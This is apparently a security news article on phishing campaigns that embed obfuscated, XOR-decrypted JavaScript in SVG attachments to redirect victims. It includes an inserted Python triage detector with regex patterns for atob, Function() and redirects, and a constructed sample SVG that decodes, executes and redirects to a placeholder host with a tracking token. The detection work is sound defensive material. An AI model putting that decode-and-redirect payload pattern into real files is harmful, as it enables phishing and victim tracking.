Exploiting SVG Files: Threat Actors Embedding Malicious JavaScript

Cybersecurity researchers are observing a surge in the abuse of Scalable Vector Graphics (SVG) files as an evasive delivery vector for JavaScript-driven redirects, marking a significant evolution in phishing tactics.

Traditionally perceived as benign image formats, SVG files are being cleverly weaponized by adversaries who embed obfuscated JavaScript within their structure, allowing malicious actions to be triggered upon rendering in a browser.

Campaigns have prominently featured phishing lures with themes such as “ToDoList,” “Missed Call,” and “Payment,” but the underlying technical manipulation remains consistent: concealment of redirection logic within the SVG file.

Phishing Campaigns Turn to SVGs

Attackers are leveraging the SVG format’s ability to house executable script elements inside <script><![CDATA[...]]></script> blocks.

This technical advantage is compounded by the use of JavaScript’s atob() function for Base64 decoding and the Function() constructor for runtime execution.

[Figure: Malicious JavaScript]
[Figure: The recipient’s perspective]

Attackers embed XOR-encrypted secondary payloads, which are decrypted in the browser, constructing and executing malicious redirects via window.location.href.

Notably, these redirects point to attacker-controlled infrastructure, with unique Base64-encoded tokens attached for victim tracking or correlation.

The meticulous structuring of the JavaScript payloads and their obfuscated, multi-stage delivery allows the attack to exploit trusted browser functions while flying beneath the radar of most traditional email security and endpoint defense tools.
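As an added example (not code from this article or the Ontinue report), the following Python triage function applies the indicators described above to an SVG file: it extracts every script element (including CDATA bodies), looks for atob(), Function()/eval(), a charCodeAt XOR loop, and a window.location assignment, and returns a verdict. The two sample SVGs are constructed for the demonstration; the suspicious one carries only placeholder strings.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"

# Indicators drawn from the behaviour described above, as (name, regex) pairs
# scored against the body of every <script> element in the file.
INDICATORS = [
    ("base64_decode", re.compile(r"\batob\s*\(")),
    ("dynamic_exec", re.compile(r"\bFunction\s*\(|\beval\s*\(")),
    ("redirect", re.compile(r"window\.location(\.href)?\s*=|location\.replace\s*\(")),
    ("xor_loop", re.compile(r"charCodeAt\s*\([^)]*\)\s*\^|\^\s*\w+\.charCodeAt")),
]

def script_bodies(svg_text):
    """Return the text of every <script> element (CDATA content included)."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        # Do not let a malformed file pass as clean: fall back to a raw scan.
        return re.findall(r"<script[^>]*>(.*?)</script>", svg_text, re.S | re.I)
    # Match both namespaced and unqualified <script> tags.
    return [el.text or "" for el in root.iter() if el.tag in (SVG_NS + "script", "script")]

def triage_svg(svg_text):
    """Classify an SVG by the script indicators it contains.
    Returns (verdict, sorted list of indicator names that matched)."""
    bodies = script_bodies(svg_text)
    found = {name for body in bodies for name, rx in INDICATORS if rx.search(body)}
    if {"dynamic_exec", "redirect"} <= found or {"base64_decode", "dynamic_exec"} <= found:
        verdict = "malicious-pattern"   # decode-and-execute chain, as in the campaign
    elif bodies:
        verdict = "suspicious-script"   # any script in an image is worth a look
    else:
        verdict = "clean"
    return verdict, sorted(found)

# Constructed samples: a plain image and a file shaped like the described lure.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
SUSPECT_SVG = """<svg xmlns="http://www.w3.org/2000/svg">
<script><![CDATA[
var k = "c"; var d = atob("Y29uc3RydWN0ZWQ="); var o = "";
for (var i = 0; i < d.length; i++) { o += String.fromCharCode(d.charCodeAt(i) ^ k.charCodeAt(0)); }
Function(o)();
window.location.href = "https://example.invalid/?t=" + btoa(o);
]]></script></svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("suspect", SUSPECT_SVG)):
        print(label, triage_svg(sample))
```

Run it over a mail gateway's quarantined .svg attachments; a "suspicious-script" result on a file that is supposed to be a static logo is already enough to hold the message for review.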

The SVG files are deployed through carefully crafted phishing emails. Attackers employ spoofed sender addresses, often exploiting domains lacking proper SPF, DKIM, and DMARC protections.

Many targeted organizations either have no DKIM records or have not set DMARC policies to quarantine or reject suspicious messages, leaving them vulnerable to impersonation.

JavaScript-Based Redirects

Attackers also routinely utilize lookalike domains that mimic legitimate brands, further increasing the credibility of their malicious communications.

Emails associated with this campaign are intentionally sparse, typically comprising little more than the SVG file as an attachment or a link.

The intent is to reduce suspicion while prompting the user to view or interact with the seemingly harmless image; at that point the browser-side JavaScript initiates the silent redirect without requiring further user input.

Further complicating detection, attacker infrastructure makes use of ephemeral domains with randomized or subdomain-based naming conventions, eluding static filtering mechanisms.

According to the Ontinue Report, the campaign infrastructure is often short-lived, with domains rotated regularly to thwart reputation-based blocking.

In many observed incidents, the final landing pages are protected by geofencing, only serving malicious content to visitors from targeted regions, making investigation and takedown efforts even more challenging.

This campaign demonstrates an evolution in phishing methodology, as adversaries pivot from dropping executable malware or malicious archives to leveraging file smuggling techniques, first with HTML and now with SVG.

By embedding obfuscated logic into an image file type trusted by most security systems, attackers circumvent traditional behavioral and signature-based detection.

Unlike previous SVG abuse campaigns, which merely hosted JavaScript payloads or scripts on third-party platforms, these attacks utilize XOR-encrypted scripts directly within the SVG, decoded and executed on the fly, ensuring zero file download footprint and minimizing detection risk.

The primary victims are B2B service providers, including organizations handling corporate, financial, and employee data, as well as SaaS and utility companies—entities that expect frequent inbound email and are therefore susceptible to targeted, minimalistic phishing attempts.

The combination of technical sophistication, social engineering, and infrastructure agility positions this SVG-based attack vector as a particularly potent threat, underscoring the need for organizations to revisit and strengthen their email authentication controls and user awareness training while adopting layered defenses capable of scrutinizing file content beyond superficial signatures.

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
